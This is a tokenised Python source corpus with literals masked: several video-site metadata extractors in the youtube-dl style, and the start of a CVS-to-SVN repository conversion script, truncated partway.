<s> from __future__ import unicode_literals <EOL> import re <EOL> from . common import InfoExtractor <EOL> from . . utils import ( <EOL> int_or_none , <EOL> parse_duration , <EOL> ) <EOL> class HornBunnyIE ( InfoExtractor ) : <EOL> _VALID_URL = r'<STR_LIT>' <EOL> _TEST = { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } <EOL> } <EOL> def _real_extract ( self , url ) : <EOL> mobj = re . match ( self . _VALID_URL , url ) <EOL> video_id = mobj . group ( '<STR_LIT:id>' ) <EOL> webpage = self . _download_webpage ( <EOL> url , video_id , note = '<STR_LIT>' ) <EOL> title = self . _html_search_regex ( <EOL> r'<STR_LIT>' , webpage , '<STR_LIT:title>' ) <EOL> redirect_url = self . _html_search_regex ( <EOL> r'<STR_LIT>' , webpage , '<STR_LIT:title>' ) <EOL> webpage2 = self . _download_webpage ( redirect_url , video_id ) <EOL> video_url = self . _html_search_regex ( <EOL> r'<STR_LIT>' , webpage2 , '<STR_LIT>' ) <EOL> duration = parse_duration ( self . _search_regex ( <EOL> r'<STR_LIT>' , <EOL> webpage , '<STR_LIT>' , fatal = False ) ) <EOL> view_count = int_or_none ( self . _search_regex ( <EOL> r'<STR_LIT>' , <EOL> webpage , '<STR_LIT>' , fatal = False ) ) <EOL> return { <EOL> '<STR_LIT:id>' : video_id , <EOL> '<STR_LIT:url>' : video_url , <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : duration , <EOL> '<STR_LIT>' : view_count , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } </s>
<s> from __future__ import unicode_literals <EOL> import os . path <EOL> import re <EOL> from . common import InfoExtractor <EOL> from . . compat import ( <EOL> compat_urllib_parse , <EOL> compat_urllib_request , <EOL> ) <EOL> class MonikerIE ( InfoExtractor ) : <EOL> IE_DESC = '<STR_LIT>' <EOL> _VALID_URL = r'<STR_LIT>' <EOL> _TESTS = [ { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> } , <EOL> } , { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> } , <EOL> } , { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> } ] <EOL> def _real_extract ( self , url ) : <EOL> video_id = self . _match_id ( url ) <EOL> orig_webpage = self . _download_webpage ( url , video_id ) <EOL> fields = re . findall ( r'<STR_LIT>' , orig_webpage ) <EOL> data = dict ( fields ) <EOL> post = compat_urllib_parse . urlencode ( data ) <EOL> headers = { <EOL> b'<STR_LIT:Content-Type>' : b'<STR_LIT>' , <EOL> } <EOL> req = compat_urllib_request . Request ( url , post , headers ) <EOL> webpage = self . _download_webpage ( <EOL> req , video_id , note = '<STR_LIT>' ) <EOL> title = os . path . splitext ( data [ '<STR_LIT>' ] ) [ <NUM_LIT:0> ] <EOL> links = re . findall ( r'<STR_LIT>' , webpage ) <EOL> formats = [ { <EOL> '<STR_LIT:url>' : l , <EOL> '<STR_LIT>' : i , <EOL> } for i , l in enumerate ( links ) ] <EOL> self . _sort_formats ( formats ) <EOL> return { <EOL> '<STR_LIT:id>' : video_id , <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : formats , <EOL> } </s>
<s> from __future__ import unicode_literals <EOL> import re <EOL> from . common import InfoExtractor <EOL> from . . compat import ( <EOL> compat_urllib_parse_urlparse , <EOL> ) <EOL> from . . utils import ( <EOL> ExtractorError , <EOL> int_or_none , <EOL> remove_end , <EOL> ) <EOL> class NFLIE ( InfoExtractor ) : <EOL> IE_NAME = '<STR_LIT>' <EOL> _VALID_URL = r'''<STR_LIT>''' <EOL> _TESTS = [ <EOL> { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } , <EOL> { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } <EOL> ] <EOL> @ staticmethod <EOL> def prepend_host ( host , url ) : <EOL> if not url . startswith ( '<STR_LIT:http>' ) : <EOL> if not url . startswith ( '<STR_LIT:/>' ) : <EOL> url = '<STR_LIT>' % url <EOL> url = '<STR_LIT>' . format ( host , url ) <EOL> return url <EOL> @ staticmethod <EOL> def format_from_stream ( stream , protocol , host , path_prefix = '<STR_LIT>' , <EOL> preference = <NUM_LIT:0> , note = None ) : <EOL> url = '<STR_LIT>' . format ( <EOL> protocol = protocol , <EOL> host = host , <EOL> prefix = path_prefix , <EOL> path = stream . get ( '<STR_LIT:path>' ) , <EOL> ) <EOL> return { <EOL> '<STR_LIT:url>' : url , <EOL> '<STR_LIT>' : int_or_none ( stream . get ( '<STR_LIT>' , <NUM_LIT:0> ) , <NUM_LIT:1000> ) , <EOL> '<STR_LIT>' : preference , <EOL> '<STR_LIT>' : note , <EOL> } <EOL> def _real_extract ( self , url ) : <EOL> mobj = re . match ( self . _VALID_URL , url ) <EOL> video_id , host = mobj . group ( '<STR_LIT:id>' ) , mobj . group ( '<STR_LIT:host>' ) <EOL> webpage = self . _download_webpage ( url , video_id ) <EOL> config_url = NFLIE . prepend_host ( host , self . _search_regex ( <EOL> r'<STR_LIT>' , webpage , '<STR_LIT>' ) ) <EOL> config = self . _download_json ( config_url , video_id , <EOL> note = '<STR_LIT>' ) <EOL> url_template = NFLIE . prepend_host ( <EOL> host , '<STR_LIT>' . format ( ** config ) ) <EOL> video_data = self . _download_json ( <EOL> url_template . format ( id = video_id ) , video_id ) <EOL> formats = [ ] <EOL> cdn_data = video_data . get ( '<STR_LIT>' , { } ) <EOL> streams = cdn_data . get ( '<STR_LIT>' , [ ] ) <EOL> if cdn_data . get ( '<STR_LIT>' ) == '<STR_LIT>' : <EOL> parts = compat_urllib_parse_urlparse ( cdn_data . get ( '<STR_LIT>' ) ) <EOL> protocol , host = parts . scheme , parts . netloc <EOL> for stream in streams : <EOL> formats . append ( <EOL> NFLIE . format_from_stream ( stream , protocol , host ) ) <EOL> else : <EOL> cdns = config . get ( '<STR_LIT>' ) <EOL> if not cdns : <EOL> raise ExtractorError ( '<STR_LIT>' , expected = True ) <EOL> for name , cdn in cdns . items ( ) : <EOL> if cdn . get ( '<STR_LIT:name>' ) == '<STR_LIT>' : <EOL> continue <EOL> protocol = cdn . get ( '<STR_LIT>' ) <EOL> host = remove_end ( cdn . get ( '<STR_LIT:host>' , '<STR_LIT>' ) , '<STR_LIT:/>' ) <EOL> if not ( protocol and host ) : <EOL> continue <EOL> prefix = cdn . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if prefix and not prefix . endswith ( '<STR_LIT:/>' ) : <EOL> prefix = '<STR_LIT>' % prefix <EOL> preference = <NUM_LIT:0> <EOL> if protocol == '<STR_LIT>' : <EOL> preference = - <NUM_LIT:2> <EOL> elif '<STR_LIT>' in name . lower ( ) : <EOL> preference = <NUM_LIT:1> <EOL> for stream in streams : <EOL> formats . append ( <EOL> NFLIE . format_from_stream ( stream , protocol , host , <EOL> prefix , preference , name ) ) <EOL> self . _sort_formats ( formats ) <EOL> thumbnail = None <EOL> for q in ( '<STR_LIT>' , '<STR_LIT:l>' , '<STR_LIT:m>' , '<STR_LIT:s>' , '<STR_LIT>' ) : <EOL> thumbnail = video_data . get ( '<STR_LIT>' , { } ) . get ( q ) <EOL> if thumbnail : <EOL> break <EOL> return { <EOL> '<STR_LIT:id>' : video_id , <EOL> '<STR_LIT:title>' : video_data . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : formats , <EOL> '<STR_LIT:description>' : video_data . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : video_data . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : thumbnail , <EOL> '<STR_LIT>' : int_or_none ( video_data . get ( '<STR_LIT>' ) , <NUM_LIT:1000> ) , <EOL> } </s>
<s> from __future__ import unicode_literals <EOL> import json <EOL> import re <EOL> from . common import InfoExtractor <EOL> from . . utils import int_or_none <EOL> class PodomaticIE ( InfoExtractor ) : <EOL> IE_NAME = '<STR_LIT>' <EOL> _VALID_URL = r'<STR_LIT>' <EOL> _TESTS = [ <EOL> { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } <EOL> } , <EOL> { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } <EOL> } , <EOL> ] <EOL> def _real_extract ( self , url ) : <EOL> mobj = re . match ( self . _VALID_URL , url ) <EOL> video_id = mobj . group ( '<STR_LIT:id>' ) <EOL> channel = mobj . group ( '<STR_LIT>' ) <EOL> json_url = ( ( '<STR_LIT>' + <EOL> '<STR_LIT>' ) % <EOL> ( mobj . group ( '<STR_LIT>' ) , channel , video_id ) ) <EOL> data_json = self . _download_webpage ( <EOL> json_url , video_id , '<STR_LIT>' ) <EOL> data = json . loads ( data_json ) <EOL> video_url = data [ '<STR_LIT>' ] <EOL> if not video_url : <EOL> video_url = '<STR_LIT>' % ( data [ '<STR_LIT>' ] . replace ( '<STR_LIT>' , '<STR_LIT:http>' ) , data [ '<STR_LIT>' ] ) <EOL> uploader = data [ '<STR_LIT>' ] <EOL> title = data [ '<STR_LIT:title>' ] <EOL> thumbnail = data [ '<STR_LIT>' ] <EOL> duration = int_or_none ( data . get ( '<STR_LIT>' ) , <NUM_LIT:1000> ) <EOL> return { <EOL> '<STR_LIT:id>' : video_id , <EOL> '<STR_LIT:url>' : video_url , <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : uploader , <EOL> '<STR_LIT>' : channel , <EOL> '<STR_LIT>' : thumbnail , <EOL> '<STR_LIT>' : duration , <EOL> } </s>
<s> from __future__ import unicode_literals <EOL> from . common import InfoExtractor <EOL> class TenPlayIE ( InfoExtractor ) : <EOL> _VALID_URL = r'<STR_LIT>' <EOL> _TEST = { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : True , <EOL> } <EOL> } <EOL> _video_fields = [ <EOL> "<STR_LIT:id>" , "<STR_LIT:name>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> def _real_extract ( self , url ) : <EOL> webpage = self . _download_webpage ( url , url ) <EOL> video_id = self . _html_search_regex ( <EOL> r'<STR_LIT>' , webpage , '<STR_LIT>' ) <EOL> api_token = self . _html_search_regex ( <EOL> r'<STR_LIT>' , webpage , '<STR_LIT>' ) <EOL> title = self . _html_search_regex ( <EOL> r'<STR_LIT>' , <EOL> webpage , '<STR_LIT:title>' ) <EOL> json = self . _download_json ( '<STR_LIT>' % ( video_id , api_token , '<STR_LIT:U+002C>' . join ( self . _video_fields ) ) , title ) <EOL> formats = [ ] <EOL> for rendition in json [ '<STR_LIT>' ] : <EOL> url = rendition [ '<STR_LIT>' ] or rendition [ '<STR_LIT:url>' ] <EOL> protocol = '<STR_LIT>' if url . startswith ( '<STR_LIT>' ) else '<STR_LIT:http>' <EOL> ext = '<STR_LIT>' if protocol == '<STR_LIT>' else rendition [ '<STR_LIT>' ] . lower ( ) <EOL> if protocol == '<STR_LIT>' : <EOL> url = url . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> formats . append ( { <EOL> '<STR_LIT>' : '<STR_LIT:_>' . join ( [ '<STR_LIT>' , rendition [ '<STR_LIT>' ] . lower ( ) , rendition [ '<STR_LIT>' ] . lower ( ) ] ) , <EOL> '<STR_LIT:width>' : rendition [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : rendition [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : rendition [ '<STR_LIT>' ] / <NUM_LIT> , <EOL> '<STR_LIT>' : rendition [ '<STR_LIT:size>' ] , <EOL> '<STR_LIT>' : protocol , <EOL> '<STR_LIT>' : ext , <EOL> '<STR_LIT>' : rendition [ '<STR_LIT>' ] . lower ( ) , <EOL> '<STR_LIT>' : rendition [ '<STR_LIT>' ] . lower ( ) , <EOL> '<STR_LIT:url>' : url , <EOL> } ) <EOL> return { <EOL> '<STR_LIT:id>' : video_id , <EOL> '<STR_LIT>' : json [ '<STR_LIT>' ] , <EOL> '<STR_LIT:title>' : json [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT:description>' : json [ '<STR_LIT>' ] or json [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : formats , <EOL> '<STR_LIT>' : [ { <EOL> '<STR_LIT:url>' : json [ '<STR_LIT>' ] <EOL> } , { <EOL> '<STR_LIT:url>' : json [ '<STR_LIT>' ] <EOL> } ] , <EOL> '<STR_LIT>' : json [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : json [ '<STR_LIT>' ] / <NUM_LIT:1000> , <EOL> '<STR_LIT>' : float ( json [ '<STR_LIT>' ] ) / <NUM_LIT:1000> , <EOL> '<STR_LIT>' : json [ '<STR_LIT>' ] [ '<STR_LIT>' ] if '<STR_LIT>' in json [ '<STR_LIT>' ] else '<STR_LIT>' , <EOL> '<STR_LIT>' : json [ '<STR_LIT>' ] <EOL> } </s>
<s> from __future__ import unicode_literals <EOL> import re <EOL> from . common import InfoExtractor <EOL> from . . utils import int_or_none <EOL> class UbuIE ( InfoExtractor ) : <EOL> _VALID_URL = r'<STR_LIT>' <EOL> _TEST = { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } , <EOL> } <EOL> def _real_extract ( self , url ) : <EOL> mobj = re . match ( self . _VALID_URL , url ) <EOL> video_id = mobj . group ( '<STR_LIT:id>' ) <EOL> webpage = self . _download_webpage ( url , video_id ) <EOL> title = self . _html_search_regex ( <EOL> r'<STR_LIT>' , webpage , '<STR_LIT:title>' ) <EOL> duration = int_or_none ( self . _html_search_regex ( <EOL> r'<STR_LIT>' , webpage , '<STR_LIT>' , fatal = False , default = None ) ) <EOL> if duration : <EOL> duration *= <NUM_LIT> <EOL> formats = [ ] <EOL> FORMAT_REGEXES = [ <EOL> [ '<STR_LIT>' , r"<STR_LIT>" ] , <EOL> [ '<STR_LIT>' , r'<STR_LIT>' ] <EOL> ] <EOL> for format_id , format_regex in FORMAT_REGEXES : <EOL> m = re . search ( format_regex , webpage ) <EOL> if m : <EOL> formats . append ( { <EOL> '<STR_LIT:url>' : m . group ( <NUM_LIT:1> ) , <EOL> '<STR_LIT>' : format_id , <EOL> } ) <EOL> return { <EOL> '<STR_LIT:id>' : video_id , <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : duration , <EOL> '<STR_LIT>' : formats , <EOL> } </s>
<s> from __future__ import unicode_literals <EOL> import re <EOL> import json <EOL> import itertools <EOL> from . common import InfoExtractor <EOL> from . . utils import unified_strdate <EOL> class VineIE ( InfoExtractor ) : <EOL> _VALID_URL = r'<STR_LIT>' <EOL> _TEST = { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> } <EOL> def _real_extract ( self , url ) : <EOL> video_id = self . _match_id ( url ) <EOL> webpage = self . _download_webpage ( '<STR_LIT>' + video_id , video_id ) <EOL> data = json . loads ( self . _html_search_regex ( <EOL> r'<STR_LIT>' % video_id , webpage , '<STR_LIT>' ) ) <EOL> formats = [ { <EOL> '<STR_LIT:url>' : data [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , { <EOL> '<STR_LIT:url>' : data [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ] <EOL> return { <EOL> '<STR_LIT:id>' : video_id , <EOL> '<STR_LIT:title>' : self . _og_search_title ( webpage ) , <EOL> '<STR_LIT>' : self . _og_search_description ( webpage ) , <EOL> '<STR_LIT:description>' : data [ '<STR_LIT:description>' ] , <EOL> '<STR_LIT>' : data [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : unified_strdate ( data [ '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' : data [ '<STR_LIT:username>' ] , <EOL> '<STR_LIT>' : data [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : data [ '<STR_LIT>' ] [ '<STR_LIT:count>' ] , <EOL> '<STR_LIT>' : data [ '<STR_LIT>' ] [ '<STR_LIT:count>' ] , <EOL> '<STR_LIT>' : data [ '<STR_LIT>' ] [ '<STR_LIT:count>' ] , <EOL> '<STR_LIT>' : formats , <EOL> } <EOL> class VineUserIE ( InfoExtractor ) : <EOL> IE_NAME = '<STR_LIT>' <EOL> _VALID_URL = r'<STR_LIT>' <EOL> _VINE_BASE_URL = "<STR_LIT>" <EOL> _TESTS = [ <EOL> { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } , <EOL> { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> } , <EOL> ] <EOL> def _real_extract ( self , url ) : <EOL> mobj = re . match ( self . _VALID_URL , url ) <EOL> user = mobj . group ( '<STR_LIT:user>' ) <EOL> u = mobj . group ( '<STR_LIT:u>' ) <EOL> profile_url = "<STR_LIT>" % ( <EOL> self . _VINE_BASE_URL , '<STR_LIT>' if not u else '<STR_LIT>' , user ) <EOL> profile_data = self . _download_json ( <EOL> profile_url , user , note = '<STR_LIT>' ) <EOL> user_id = profile_data [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] <EOL> timeline_data = [ ] <EOL> for pagenum in itertools . count ( <NUM_LIT:1> ) : <EOL> timeline_url = "<STR_LIT>" % ( <EOL> self . _VINE_BASE_URL , user_id , pagenum ) <EOL> timeline_page = self . _download_json ( <EOL> timeline_url , user , note = '<STR_LIT>' % pagenum ) <EOL> timeline_data . extend ( timeline_page [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] ) <EOL> if timeline_page [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] is None : <EOL> break <EOL> entries = [ <EOL> self . url_result ( e [ '<STR_LIT>' ] , '<STR_LIT>' ) for e in timeline_data ] <EOL> return self . playlist_result ( entries , user ) </s>
<s> from __future__ import unicode_literals <EOL> from . common import InfoExtractor <EOL> from . . utils import ( <EOL> HEADRequest , <EOL> get_element_by_attribute , <EOL> parse_iso8601 , <EOL> ) <EOL> class YesJapanIE ( InfoExtractor ) : <EOL> _VALID_URL = r'<STR_LIT>' <EOL> _TEST = { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } <EOL> def _real_extract ( self , url ) : <EOL> video_id = self . _match_id ( url ) <EOL> webpage = self . _download_webpage ( url , video_id ) <EOL> title = self . _og_search_title ( webpage ) <EOL> video_url = self . _og_search_video_url ( webpage ) <EOL> description = self . _og_search_description ( webpage ) <EOL> thumbnail = self . _og_search_thumbnail ( webpage ) <EOL> timestamp = None <EOL> submit_info = get_element_by_attribute ( '<STR_LIT:class>' , '<STR_LIT>' , webpage ) <EOL> if submit_info : <EOL> timestamp = parse_iso8601 ( self . _search_regex ( <EOL> r'<STR_LIT>' , submit_info , '<STR_LIT>' , fatal = False , default = None ) ) <EOL> redirect_req = HEADRequest ( video_url ) <EOL> req = self . _request_webpage ( <EOL> redirect_req , video_id , note = '<STR_LIT>' , errnote = '<STR_LIT>' , fatal = False ) <EOL> if req : <EOL> video_url = req . geturl ( ) <EOL> formats = [ { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:url>' : video_url , <EOL> } ] <EOL> return { <EOL> '<STR_LIT:id>' : video_id , <EOL> '<STR_LIT:title>' : title , <EOL> '<STR_LIT>' : formats , <EOL> '<STR_LIT:description>' : description , <EOL> '<STR_LIT>' : timestamp , <EOL> '<STR_LIT>' : thumbnail , <EOL> } </s>
<s> import getopt <EOL> import os <EOL> import rcsparse <EOL> import re <EOL> import string <EOL> import subprocess <EOL> import sys <EOL> import time <EOL> from hashlib import md5 <EOL> from svn import core , fs , delta , repos <EOL> CHANGESET_FUZZ_SEC = <NUM_LIT> <EOL> def usage ( ) : <EOL> print >> sys . stderr , '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' <EOL> def main ( ) : <EOL> email_domain = None <EOL> do_incremental = False <EOL> dump_all = False <EOL> log_encoding = '<STR_LIT>' <EOL> rcs = RcsKeywords ( ) ; <EOL> modules = [ ] <EOL> fuzzsec = CHANGESET_FUZZ_SEC <EOL> try : <EOL> opts , args = getopt . getopt ( sys . argv [ <NUM_LIT:1> : ] , '<STR_LIT>' ) <EOL> for opt , v in opts : <EOL> if opt == '<STR_LIT>' : <EOL> fuzzsec = int ( v ) <EOL> elif opt == '<STR_LIT>' : <EOL> email_domain = v <EOL> elif opt == '<STR_LIT>' : <EOL> dump_all = True <EOL> elif opt == '<STR_LIT>' : <EOL> log_encoding = v <EOL> elif opt == '<STR_LIT>' : <EOL> rcs . add_id_keyword ( v ) <EOL> elif opt == '<STR_LIT>' : <EOL> modules . append ( v ) <EOL> elif opt == '<STR_LIT>' : <EOL> usage ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> except Exception , msg : <EOL> print >> sys . stderr , msg <EOL> usage ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if len ( args ) != <NUM_LIT:1> and len ( args ) != <NUM_LIT:3> : <EOL> usage ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> log_encodings = log_encoding . split ( '<STR_LIT:U+002C>' ) <EOL> cvsroot = args [ <NUM_LIT:0> ] <EOL> while cvsroot [ - <NUM_LIT:1> ] == '<STR_LIT:/>' : <EOL> cvsroot = cvsroot [ : - <NUM_LIT:1> ] <EOL> if len ( args ) == <NUM_LIT:3> : <EOL> svnroot = args [ <NUM_LIT:1> ] <EOL> svnpath = args [ <NUM_LIT:2> ] <EOL> else : <EOL> svnroot = None <EOL> svnpath = None <EOL> if svnroot is None : <EOL> svn = SvnDumper ( ) <EOL> else : <EOL> svn = SvnDumper ( svnpath ) <EOL> try : <EOL> svn . load ( svnroot ) <EOL> if svn . last_rev is not None : <EOL> do_incremental = True <EOL> print >> sys . stderr , '<STR_LIT>' % ( svn . last_rev , svn . last_author ) <EOL> except : <EOL> pass <EOL> if do_incremental and email_domain is not None and svn . last_author . lower ( ) . endswith ( ( '<STR_LIT:@>' + email_domain ) . lower ( ) ) : <EOL> last_author = svn . last_author [ : - <NUM_LIT:1> * ( <NUM_LIT:1> + len ( email_domain ) ) ] <EOL> else : <EOL> last_author = svn . last_author <EOL> cvs = CvsConv ( cvsroot , rcs , not do_incremental , fuzzsec ) <EOL> print >> sys . stderr , '<STR_LIT>' <EOL> if len ( modules ) == <NUM_LIT:0> : <EOL> cvs . walk ( ) <EOL> else : <EOL> for module in modules : <EOL> cvs . walk ( module ) <EOL> svn . dump = True <EOL> changesets = sorted ( cvs . changesets ) <EOL> nchangesets = len ( changesets ) <EOL> print >> sys . stderr , '<STR_LIT>' % ( nchangesets ) <EOL> if nchangesets <= <NUM_LIT:0> : <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> if not dump_all : <EOL> max_time_max = changesets [ - <NUM_LIT:1> ] . max_time - <NUM_LIT> <EOL> else : <EOL> max_time_max = changesets [ - <NUM_LIT:1> ] . max_time <EOL> printOnce = False <EOL> found_last_revision = False <EOL> for i , k in enumerate ( changesets ) : <EOL> if do_incremental and not found_last_revision : <EOL> if k . min_time == svn . last_date and k . author == last_author : <EOL> found_last_revision = True <EOL> continue <EOL> if k . max_time > max_time_max : <EOL> break <EOL> if not printOnce : <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> printOnce = True <EOL> finfo = k . revs [ <NUM_LIT:0> ] <EOL> rcsfile = rcsparse . rcsfile ( finfo . path ) <EOL> log = rcsparse . rcsfile ( k . revs [ <NUM_LIT:0> ] . path ) . getlog ( k . revs [ <NUM_LIT:0> ] . rev ) <EOL> for i , e in enumerate ( log_encodings ) : <EOL> try : <EOL> how = '<STR_LIT:ignore>' if i == len ( log_encodings ) - <NUM_LIT:1> else '<STR_LIT:strict>' ; <EOL> log = log . decode ( e , how ) <EOL> break <EOL> except : <EOL> pass <EOL> log = log . encode ( '<STR_LIT:utf-8>' , '<STR_LIT:ignore>' ) <EOL> if email_domain is None : <EOL> email = k . author <EOL> else : <EOL> email = k . author + '<STR_LIT:@>' + email_domain <EOL> revprops = str_prop ( '<STR_LIT>' , email ) <EOL> revprops += str_prop ( '<STR_LIT>' , svn_time ( k . min_time ) ) <EOL> revprops += str_prop ( '<STR_LIT>' , log ) <EOL> revprops += '<STR_LIT>' <EOL> print '<STR_LIT>' % ( i + <NUM_LIT:1> ) <EOL> print '<STR_LIT>' % ( len ( revprops ) ) <EOL> print '<STR_LIT>' % ( len ( revprops ) ) <EOL> print '<STR_LIT>' <EOL> print revprops <EOL> for f in k . revs : <EOL> rcsfile = rcsparse . rcsfile ( f . path ) <EOL> fileprops = '<STR_LIT>' <EOL> if os . access ( f . path , os . X_OK ) : <EOL> fileprops += str_prop ( '<STR_LIT>' , '<STR_LIT:*>' ) <EOL> fileprops += '<STR_LIT>' <EOL> 